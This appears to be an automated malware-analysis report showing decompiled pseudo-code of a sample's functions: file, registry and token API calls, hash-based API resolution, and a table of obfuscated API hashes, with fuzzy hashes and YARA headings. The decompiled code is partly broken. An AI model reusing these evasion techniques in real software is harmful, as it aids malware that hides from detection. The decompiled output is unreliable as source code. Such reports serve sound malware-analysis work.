                                                                                                        			E6E485BB3(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6E483064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E47C26C(_t23);
				if(E6E47C280(_t23) != 0) {
					_t31[2] = E6E4835F0(0x100);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6E483064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6E483698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6E483064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}














                                                                                                        0x6e485bb3
                                                                                                        0x6e485bba
                                                                                                        0x6e485c09
                                                                                                        0x6e485c12
                                                                                                        0x6e485c18
                                                                                                        0x6e485c19
                                                                                                        0x6e485c0b
                                                                                                        0x6e485c0d
                                                                                                        0x6e485c0d
                                                                                                        0x6e485c2f
                                                                                                        0x6e485c43
                                                                                                        0x6e485c31
                                                                                                        0x6e485c3e
                                                                                                        0x6e485c40
                                                                                                        0x6e485c40
                                                                                                        0x6e485c45
                                                                                                        0x6e485c4a
                                                                                                        0x6e485c58
                                                                                                        0x6e485cc3
                                                                                                        0x6e485cc6
                                                                                                        0x6e485c5a
                                                                                                        0x6e485c5f
                                                                                                        0x6e485cac
                                                                                                        0x6e485cb0
                                                                                                        0x6e485cba
                                                                                                        0x6e485cba
                                                                                                        0x6e485cb0
                                                                                                        0x6e485c61
                                                                                                        0x6e485c6d
                                                                                                        0x6e485c72
                                                                                                        0x6e485c86
                                                                                                        0x6e485c88
                                                                                                        0x6e485c89
                                                                                                        0x6e485c8a
                                                                                                        0x6e485c8c
                                                                                                        0x6e485c8e
                                                                                                        0x6e485c8f
                                                                                                        0x6e485c8f
                                                                                                        0x6e485c92
                                                                                                        0x6e485c92
                                                                                                        0x6e485c9a

                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E485C3E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: fd453b4d94b8717904924a4bfaa5cf84b2704d2f9b2ed6019faa6721121f1a3e
                                                                                                        • Instruction ID: cf477ea30c3d8cb20699addafb9282d697b8b30d5ff8d57587a226db24d4d384
                                                                                                        • Opcode Fuzzy Hash: fd453b4d94b8717904924a4bfaa5cf84b2704d2f9b2ed6019faa6721121f1a3e
                                                                                                        • Instruction Fuzzy Hash: E1017B3168030ABAFB512AF44C44FBB778CDF82258F00483BFA03652C9EF1AE855C5A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 6E485C01, Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 48%
                                                                                                        			E6E485C01(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6E483064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E47C26C(_t23);
				if(E6E47C280(_t23) != 0) {
					_t31[2] = E6E4835F0(0);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6E483064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6E483698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6E483064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}














                                                                                                        0x6e485c01
                                                                                                        0x6e485c05
                                                                                                        0x6e485c09
                                                                                                        0x6e485c12
                                                                                                        0x6e485c18
                                                                                                        0x6e485c19
                                                                                                        0x6e485c0b
                                                                                                        0x6e485c0d
                                                                                                        0x6e485c0d
                                                                                                        0x6e485c2f
                                                                                                        0x6e485c43
                                                                                                        0x6e485c31
                                                                                                        0x6e485c3e
                                                                                                        0x6e485c40
                                                                                                        0x6e485c40
                                                                                                        0x6e485c45
                                                                                                        0x6e485c4a
                                                                                                        0x6e485c58
                                                                                                        0x6e485cc3
                                                                                                        0x6e485cc6
                                                                                                        0x6e485c5a
                                                                                                        0x6e485c5f
                                                                                                        0x6e485cac
                                                                                                        0x6e485cb0
                                                                                                        0x6e485cba
                                                                                                        0x6e485cba
                                                                                                        0x6e485cb0
                                                                                                        0x6e485c61
                                                                                                        0x6e485c6d
                                                                                                        0x6e485c72
                                                                                                        0x6e485c86
                                                                                                        0x6e485c88
                                                                                                        0x6e485c89
                                                                                                        0x6e485c8a
                                                                                                        0x6e485c8c
                                                                                                        0x6e485c8e
                                                                                                        0x6e485c8f
                                                                                                        0x6e485c8f
                                                                                                        0x6e485c92
                                                                                                        0x6e485c92
                                                                                                        0x6e485c9a

                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E485C3E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: 58b5aa14198def0d92bf4b4c46dd0558d7dd4de209147f86e2b3c819d4d50927
                                                                                                        • Instruction ID: 0e36d7ddf8f9d270d6283d513ae22b9d034f2d37fb617cf1fac05426b1b46719
                                                                                                        • Opcode Fuzzy Hash: 58b5aa14198def0d92bf4b4c46dd0558d7dd4de209147f86e2b3c819d4d50927
                                                                                                        • Instruction Fuzzy Hash: D9012B3568030A7AFB612AF54D44FBB774CDF81658F00483BFA0265289EF16E555C5A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 6E485E10, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 63%
                                                                                                        			E6E485E10(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E6E47C280(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E6E483064(0x8e844d1e, 0xba53868) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}









                                                                                                        0x6e485e14
                                                                                                        0x6e485e15
                                                                                                        0x6e485e17
                                                                                                        0x6e485e1d
                                                                                                        0x6e485e1f
                                                                                                        0x6e485e23
                                                                                                        0x6e485e23
                                                                                                        0x6e485e27
                                                                                                        0x6e485e33
                                                                                                        0x6e485e67
                                                                                                        0x6e485e67
                                                                                                        0x00000000
                                                                                                        0x6e485e35
                                                                                                        0x6e485e3a
                                                                                                        0x6e485e3b
                                                                                                        0x6e485e4f
                                                                                                        0x6e485e60
                                                                                                        0x6e485e51
                                                                                                        0x6e485e5c
                                                                                                        0x6e485e5c
                                                                                                        0x6e485e65
                                                                                                        0x6e485e6d
                                                                                                        0x6e485e6f
                                                                                                        0x6e485e72
                                                                                                        0x6e485e77
                                                                                                        0x6e485e77
                                                                                                        0x6e485e7b
                                                                                                        0x6e485e80
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e485e65

                                                                                                        APIs
                                                                                                        • SetFilePointer.KERNELBASE(?,00000000,?,00000001,0BA53868,?,?,00000000,00000000,?,6E485D48,?,?), ref: 6E485E5C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FilePointer
                                                                                                        • String ID:
                                                                                                        • API String ID: 973152223-0
                                                                                                        • Opcode ID: 81883a7f7b798860578a1a75a64f6229bbff1743631c676b12ff8142a5686874
                                                                                                        • Instruction ID: 4194edc8d41753ab7a1c795d0ecf6e7c8c84bed5cd89d2023a63e1f65c2a224e
                                                                                                        • Opcode Fuzzy Hash: 81883a7f7b798860578a1a75a64f6229bbff1743631c676b12ff8142a5686874
                                                                                                        • Instruction Fuzzy Hash: 09F04931A08B1179DB515BB89C40FA773E8DFD1750F114B2FF542A6244E760C444C2A0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 6E48564C, Relevance: 1.5, APIs: 1, Instructions: 45registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E6E48564C(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E6E483064(0x150c05fc, 0xed2313f7) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E6E47E644(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}









                                                                                                        0x6e485656
                                                                                                        0x6e485658
                                                                                                        0x6e48565f
                                                                                                        0x6e485661
                                                                                                        0x6e485665
                                                                                                        0x6e485667
                                                                                                        0x6e48566a
                                                                                                        0x6e48566d
                                                                                                        0x6e48566d
                                                                                                        0x6e485687
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e485698
                                                                                                        0x6e48569c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e4856aa
                                                                                                        0x6e4856ad
                                                                                                        0x6e4856b2
                                                                                                        0x6e4856b7
                                                                                                        0x6e4856b7

                                                                                                        APIs
                                                                                                        • RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,150C05FC,ED2313F7,?,?,150C05FC,ED2313F7), ref: 6E485698
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: EnumValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 2814608202-0
                                                                                                        • Opcode ID: ce57060c0c74c73790e298699b79442642d4b62f4a997544e107782f72be450e
                                                                                                        • Instruction ID: 2fbeded27e68232d4761793a93305a65ed398090529adc566c84143b026785df
                                                                                                        • Opcode Fuzzy Hash: ce57060c0c74c73790e298699b79442642d4b62f4a997544e107782f72be450e
                                                                                                        • Instruction Fuzzy Hash: D8F0C8B510430AAFE7259E6ACC54DB7BBFCDBC1B50F00851EA0D552240EA35EC50C9B0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 6E481030, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 45%
                                                                                                        			E6E481030(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E6E48306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E6E48306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0x150c05f8
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}









                                                                                                        0x6e48103e
                                                                                                        0x6e481040
                                                                                                        0x6e48104e
                                                                                                        0x6e481052
                                                                                                        0x6e48109b
                                                                                                        0x00000000
                                                                                                        0x6e48109b
                                                                                                        0x6e481057
                                                                                                        0x6e481058
                                                                                                        0x6e48105a
                                                                                                        0x6e48105f
                                                                                                        0x00000000
                                                                                                        0x6e481078
                                                                                                        0x6e48107c
                                                                                                        0x6e481089
                                                                                                        0x6e48108d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e481096

                                                                                                        APIs
                                                                                                        • GetTokenInformation.KERNELBASE(00000004,00000014,150C05F8,00000004,150C05FC,150C05FC,150C05FC), ref: 6E481089
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InformationToken
                                                                                                        • String ID:
                                                                                                        • API String ID: 4114910276-0
                                                                                                        • Opcode ID: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
                                                                                                        • Instruction ID: 0db830e95f25f1894dbd9a359923be24de58c2e5b4b9a61ff6840f692a0eb3ae
                                                                                                        • Opcode Fuzzy Hash: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
                                                                                                        • Instruction Fuzzy Hash: 9CF06270344643ABFA4195B89C68F7F33ED5BC2614F50883AB650CA794EF78C9498626
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 6E483628, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 29%
                                                                                                        			E6E483628(void* __ecx) {
				void* _t3;
				intOrPtr* _t7;
				void* _t9;

				_t9 = __ecx;
				if( *0x6e48d228 == 0xa33c83e5) {
					_t7 = E6E483064(0x60a28c5c, 0x1c6ef387);
					 *0x6e48d22c = E6E483064(0x60a28c5c, 0x5e0afaa3);
					if( *0x6e48d228 == 0xa33c83e5) {
						 *_t7(2, 0, 0, 0, 0, 0); // executed
						 *0x6e48d228 = 0;
					}
				}
				_t3 = E6E483064(0x60a28c5c, 0x45b68b68);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t9);
					_push(8);
					_push( *0x6e48d228);
					asm("int3");
					asm("int3");
					return _t3;
				}
			}






                                                                                                        0x6e483630
                                                                                                        0x6e483638
                                                                                                        0x6e48366b
                                                                                                        0x6e48367c
                                                                                                        0x6e483687
                                                                                                        0x6e483692
                                                                                                        0x6e483694
                                                                                                        0x6e483694
                                                                                                        0x6e483687
                                                                                                        0x6e483644
                                                                                                        0x6e48364b
                                                                                                        0x00000000
                                                                                                        0x6e48364d
                                                                                                        0x6e48364d
                                                                                                        0x6e48364e
                                                                                                        0x6e483650
                                                                                                        0x6e483652
                                                                                                        0x6e483653
                                                                                                        0x00000000
                                                                                                        0x6e483653

                                                                                                        APIs
                                                                                                        • RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,60A28C5C,5E0AFAA3,60A28C5C,1C6EF387,?,?,00000000,6E47DE09,?,?), ref: 6E483692
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 10892065-0
                                                                                                        • Opcode ID: 16e1111f5e9ba65141f37881f07fe1d90de8d7f7e42a10c232112ca1d74b14de
                                                                                                        • Instruction ID: 80a3e0914983e621a45540820c85a2ab416d0c6d6950ae4e00735e9fb2074c16
                                                                                                        • Opcode Fuzzy Hash: 16e1111f5e9ba65141f37881f07fe1d90de8d7f7e42a10c232112ca1d74b14de
                                                                                                        • Instruction Fuzzy Hash: 18F0B424156291BDEA7019FEAC08E539698EBA6655F000C3BF284B5204D7B4C441D675
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01181D08, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1053741780.0000000001180000.00000040.00000001.sdmp, Offset: 01180000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
                                                                                                        • Instruction ID: 795e1316934259b3e31ecb02cf3cced73342bdfaf97c821618cb520946636b9d
                                                                                                        • Opcode Fuzzy Hash: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
                                                                                                        • Instruction Fuzzy Hash: 1B4104B5E0521A9FDB08DF98D494AAEBBF0FF48314F15852DE849AB340D379A841CF94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Function 6E471494, Relevance: 1.9, Strings: 1, Instructions: 613COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 31%
                                                                                                        			E6E471494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6E47F584( &_v72, 0);
				_v60 = 0xe7942190;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6E47F828( &_v76, E6E47F4CC( &_v76) + 0x10);
				E6E47F4BC( &_v80, E6E47F4CC( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x4074eca0;
				asm("movq [ecx+0x18], xmm0");
				E6E47F828( &_v84, E6E47F4CC(_t325) + 0x10);
				E6E47F4BC( &_v88, E6E47F4CC( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0x742aedea;
				asm("movq [ecx+0x18], xmm0");
				E6E47F828( &_v92, E6E47F4CC(_t329) + 0x10);
				E6E47F4BC( &_v96, E6E47F4CC( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x414fdf7;
				asm("movq [ecx+0x18], xmm0");
				E6E47F828( &_v100, E6E47F4CC(_t333) + 0x10);
				E6E47F4BC( &_v104, E6E47F4CC( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xdb41c42;
				asm("movq [ecx+0x18], xmm0");
				E6E47F828( &_v108, E6E47F4CC(_t337) + 0x10);
				E6E47F4BC( &_v112, E6E47F4CC( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0xb84fc88b;
				asm("movq [ecx+0x18], xmm0");
				E6E47F828( &_v116, E6E47F4CC(_t341) + 0x10);
				E6E47F4BC( &_v120, E6E47F4CC( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0x3937949d;
				asm("movq [ecx+0x18], xmm0");
				E6E47F828( &_v124, E6E47F4CC(_t345) + 0x10);
				E6E47F4BC( &_v128, E6E47F4CC( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x840d15ae;
				asm("movq [ecx+0x18], xmm0");
				E6E47F828( &_v132, E6E47F4CC(_t349) + 0x10);
				E6E47F4BC( &_v136, E6E47F4CC( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0xe96b154c;
				asm("movq [ecx+0x18], xmm0");
				E6E47F828( &_v140, E6E47F4CC(_t353) + 0x10);
				E6E47F4BC( &_v144, E6E47F4CC( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0x35237dcf;
				asm("movq [ecx+0x18], xmm0");
				E6E47F828( &_v148, E6E47F4CC(_t357) + 0x10);
				E6E47F4BC( &_v152, E6E47F4CC( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0x60014416;
				asm("movq [ecx+0x18], xmm0");
				E6E47F828( &_v156, E6E47F4CC(_t361) + 0x10);
				E6E47F4BC( &_v160, E6E47F4CC( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x9376283c;
				asm("movq [ecx+0x18], xmm0");
				E6E47F828( &_v164, E6E47F4CC(_t365) + 0x10);
				E6E47F4BC( &_v168, E6E47F4CC( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x1c6ef387;
				asm("movq [ecx+0x18], xmm0");
				E6E47F828( &_v172, E6E47F4CC(_t369) + 0x10);
				E6E47F4BC( &_v176, E6E47F4CC( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x45b68b68;
				asm("movq [ecx+0x18], xmm0");
				E6E47F828( &_v180, E6E47F4CC(_t373) + 0x10);
				E6E47F4BC( &_v184, E6E47F4CC( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x5d116ac0;
				asm("movq [ecx+0x18], xmm0");
				E6E47F828( &_v188, E6E47F4CC(_t377) + 0x10);
				E6E47F4BC( &_v192, E6E47F4CC( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x4b736e38;
				asm("movq [ecx+0x18], xmm0");
				E6E47F828( &_v196, E6E47F4CC(_t381) + 0x10);
